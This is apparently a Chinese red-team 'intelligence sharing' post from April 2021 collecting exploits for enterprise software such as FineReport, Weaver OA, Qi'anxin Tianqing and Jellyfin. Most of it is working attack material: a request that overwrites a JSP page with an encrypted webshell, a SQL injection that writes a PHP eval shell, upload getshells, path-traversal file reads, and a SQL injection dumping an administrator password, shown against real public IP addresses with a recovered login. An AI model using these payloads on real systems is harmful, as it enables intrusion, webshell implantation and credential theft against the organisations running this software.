|
2021.4.8 HVV | 情报共享
2021.4.8 情报共享 第一批
exchange、致远、天眼、shiro 存在0day
金蝶K3Cloud命令执行 全版本 前台 默认配置
和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置
用友U8Cloud命令执行
h3c计算管理平台任意账户添加 2016年版
红帆OA任意文件写入漏洞
启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(CVE已有)
帆软系统疑似存在0day,被RCE。
帆软 V9getshell FineReport V9
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:
- POST /WebReport/ReportServer?
- op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1
- Host: 192.168.169.138:8080
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
- Chrome/81.0.4044.92 Safari/537.36
- Connection: close
- Accept-Au: 0c42b2f264071be0507acea1876c74
- Content-Type: text/xml;charset=UTF-8
- Content-Length: 675
- {"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends
- ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
- super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null) {String
- k=(""+UUID.randomUUID()).replace("-
- ","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher
- c=Cipher.getInstance("AES");c.init(2,new
- SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new
- U(this.getClass().getClassLoader()).g(c.doFinal(new
- sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta
- nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}
复制代码
和信创天云桌面命令执行
- POST /Upload/upload_file.php?l=1 HTTP/1.1
- Host: x.x.x.x
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
- Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
- Referer: x.x.x.x
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
- Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
- Content-Length: 164
- ------WebKitFormBoundaryfcKRltGv
- Content-Disposition: form-data; name="file"; filename="1.png"
- Content-Type: image/avif
- 1
- ------WebKitFormBoundaryfcKRltGv--
复制代码 天擎
越权访问:GET /api/dbstat/gettablessize HTTP/1.1
Jellyfin任意文件读取
GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1
GET /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
天擎-前台sql注入
注入写shell:
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--
利用过程:
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
2. 通过注入点,创建一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
5. 删除 表O
泛微OA9 前台无限制Getshell
漏洞位于:/page/exportImport/uploadOperation.jsp文件中
Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈
重点关注File file=new File(savepath+filename),
Filename参数,是前台可控的,并且没有做任何过滤限制
利用非常简单,只要对着
127.0.0.1/page/exportImport/uploadOperation.jsp
来一个multipartRequest就可以,利用简单,自评高危!!
然后请求路径:
view-source:http://112.91.144.90:5006/page/exportImport/fileTransfer/1.jsp
泛微OA8 前台SQL注入
漏洞URL:
http://106.15.190.147/js/hrm/get ... electAllId&sql=***注入点
在getdata.jsp中,直接将request对象交给
weaver.hrm.common.AjaxManager.getData(HttpServletRequest,ServletContext) :
方法处理
在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法
Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)
在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中
在getSelectAllIds(sql,type)方法中,直接将sql参数的值,传递进数据库执行,并判断type的值是否等于5,如果等于5,获取查询结果的requestId字段,否则获取查询结果的id字段
到此,参数从URL,一直到数据库被执行
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=selectpassword as id from userinfo;
即可完成对数据库操控
在浏览器中,构造测试URL:
http://106.15.190.147/js/hrm/get ... ct%201234%20as%20id
页面显示1234
使用payload:
Select password as id from HrmResourceManager
http://106.15.190.147/js/hrm/get ... 0HrmResourceManager
查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)
对密文进行md5对比:
使用sysadmin 123450aA.登录系统
默安蜜罐管理平台未授权问
Fofa 搜索 幻阵可找到部分公开在公网端口
1、进入幻阵安装系统
刷新并抓包
Drop掉 /huanzhen/have_installed?
Drop掉 /huanzhen/mode?timestamp
Drop 掉 /huanzhen/version_info
进入页面
点击调试工具并放包
可见可执行ping命令
点击一键诊断
|
|